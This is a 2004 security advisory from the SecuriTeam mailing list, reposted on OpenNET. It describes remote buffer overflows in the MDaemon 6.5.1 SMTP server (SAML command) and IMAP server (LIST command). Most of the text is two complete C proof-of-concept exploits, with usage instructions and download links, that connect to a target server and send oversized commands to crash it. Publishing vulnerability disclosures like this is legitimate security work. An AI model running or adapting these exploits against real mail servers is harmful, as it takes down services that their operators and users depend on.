The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] Mdaemon SMTP and IMAP Server Remote Buffer Overflow (SAML, LIST commands)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 25 Sep 2004 23:43:27 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NT] Mdaemon SMTP and IMAP Server Remote Buffer Overflow (SAML, LIST commands)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mdaemon SMTP and IMAP Server Remote Buffer Overflow (SAML, LIST commands)
------------------------------------------------------------------------


SUMMARY

" <http://shop.mdaemontools.com/mdaemon.php>; MDaemon offers a full range 
of mail server functionality. MDaemon protects your users from spam and 
viruses, provides full security, includes seamless web access to your 
email via WorldClient, remote administration, and much more!".
By supplying a long parameter to the SAML , SOML, SEND, MAIL commands, a 
remote attacker can crash the Mdaemon SMTP server.
By supplying a long parameter to the LIST command , a remote attacker 
which can log on to the server can crash the Mdaemon IMAP server.

DETAILS

Vulnerable Systems:
 * Mdaemon smtp / imap server v6.5.1 (possibly previous versions are also 
vulnerable).

Presented below are Proof of Concept code for the two vulnerabilites.

Mdaemon SMTP Server Exploit Code:
/////////////////////////////////////////////////////////////
//        Remote DoS and proof-of-concept exploit          //
//                         for                    //
//               Mdaemon smtp server v6.5.1                //
//                    and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.             //
//                    Author: D_BuG.                       //
//                     [email protected]                 //
//                   Data: 16/09/2004             //
//                     NOT PUBLIC!                         //
//        Greets:Rasco.                        //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
 
 {
 
 printf("Remote DoS and proof-of-concept(buffer overflow) exploit\n");
 printf("                         for                              \n");
 printf("Mdaemon smtp server v6.5.1 and possible other version.\n");
 if(argc!=4)
 {
 printf("Usage: %s <IPADDRESS> <PORT> <TARGET>\n",argv[0]);
 printf("Target:\n1.DoS.\n2.Proof-of-concept(buffer overflow).\n");
 printf("e.g.:%s 192.168.1.1 25 1\n",argv[0]);
 exit(-1);
 }


      sa.sin_family=AF_INET;
 sa.sin_port=htons(atoi(argv[2]));
 if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
 printf("Error inet_pton\n");
  
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 
 printf("[~]Connecting...\n");
 
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
 {
 printf("[-]Connect filed....\nExit...\n");
 exit(-1);
 }

int len=247;
 
if(atoi(argv[3])==2)
{
len++;
}
 
char szBuffer[len+7];
char buff[len];
char send[]="EHLO tester\n";
char send3[]="RCPT TO postmaster\n";
char rcv[1024];
int i;
for(i=0;i<len;i++)
    {
    buff[i]=0x41;
    }
    
sprintf(szBuffer,"SAML %s\n",buff);

  printf("[+]Ok!\n");
  sleep(2);
  printf("[~]Get banner...\n");
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
      
  if(strstr(rcv,"220")==NULL)
  {
  printf("[-]Failed!\n");
  }
  else
  {
  printf("[+]Ok!\n");
      }
         
  printf("[~]Send EHLO...\n");
  write(sock,send,sizeof(send)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"250")==NULL)
  {
  printf("[-]Failed...\n");
  }
  else
  {
  printf("[+]Ok!\n");
  }
  printf("[~]Send SAML...\n");
  write(sock,szBuffer,strlen(szBuffer));//Send SAML
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"250")==NULL)
  {
  printf("[-]Exploit failed...please check your version Mdaemon!\n");
  printf("[-]Exit...\n");
  exit(-1);
  }
  printf("[+]Ok!\n");
  
  printf("[~]Send RCPT...\n\n");
  write(sock,send3,sizeof(send3)-1);//Send RCPT
  sleep(2);
  if(atoi(argv[3])==2)
  {
  printf("[+]Crash service.....\n");
  }
  else
  {
  printf("[+]DoS service.....\n");
  }
  printf("[~]Done.\n");
  
  close(sock);
  
return 0;

}


Mdaemon IMAP Server Proof of Concept Code:
/////////////////////////////////////////////////////////////
//            Remote proof-of-concept exploit              //
//                         for                             //
//               Mdaemon IMAP server v6.5.1                //
//                    and                             //
//                possible other version.                  //
//                   Find bug: D_BuG.                      //
//                    Author: D_BuG.                       //
//                     [email protected]                         //
//                   Data: 16/09/2004                      //
//                     NOT PUBLIC!                         //
//                                                         //
/////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int     sock,err;
struct  sockaddr_in sa;


int main (int argc, char *argv[])
 
 {
 
 printf("Remote proof-of-concept(buffer overflow) exploit\n");
 printf("                         for                              \n");
 printf("Mdaemon IMAP server v6.5.1 and possible other version.\n");
 if(argc!=3)
 {
 printf("Usage: %s <IPADDRESS> <PORT>\n",argv[0]);
 printf("e.g.:%s 192.168.1.1 143\n",argv[0]);
 exit(-1);
 }


    sa.sin_family=AF_INET;
 sa.sin_port=htons(atoi(argv[2]));
 if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0)
 printf("Error inet_pton\n");
  
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 
 printf("[~]Connecting...\n");
 
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0)
 {
 printf("[-]Connect filed....\nExit...\n");
 exit(-1);
 }


char send[]="0001 LOGIN ""test"" ""console""\r\n";
char send3[]=
"007x LIST "
"""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"""
""" 
*BBBBBBBBBBaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAA
AAAc"""
"\r\n\r\n";
char rcv[1024];


  printf("[+]Ok!\n");
  sleep(2);
  printf("[~]Get banner...\n");
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
      
  if(strstr(rcv,"IMAP")==NULL)
  {
  printf("[-]Failed!\n");
  }
  else
  {
  printf("[+]Ok!\n");
      }
         
  printf("[~]Send LOGIN and PASSWORD...\n");
  write(sock,send,sizeof(send)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"OK")==NULL)
  {
  printf("[-]Failed login or password...\nExit...");
  exit(-1);
  }
  
  printf("[+]Ok!\n");
  
  printf("[~]Send LIST...\n");
  write(sock,send3,sizeof(send3)-1);
  sleep(2);
  memset(rcv,0,1024);
  if(read(sock,&rcv,sizeof(rcv)) !=-1){}
  
  if(strstr(rcv,"BAD")!=NULL)
  {
  printf("[-]Exploit filed...please check your version Mdaemon!\n");
  printf("[-]Exit...\n");
  exit(-1);
  }
  printf("[+]Ok!\n");
  printf("[+]Crash service.....\n");
  printf("[~]Done.\n");
  
  close(sock);
  
return 0;

}

The exploits can be also found at:
 <http://www.securitylab.ru/_Exploits/2004/09/mdaemon_rcpt.c>; 
http://www.securitylab.ru/_Exploits/2004/09/mdaemon_rcpt.c
 <http://www.securitylab.ru/_Exploits/2004/09/mdaemon_imap.c>; 
http://www.securitylab.ru/_Exploits/2004/09/mdaemon_imap.c


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> D_BuG.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру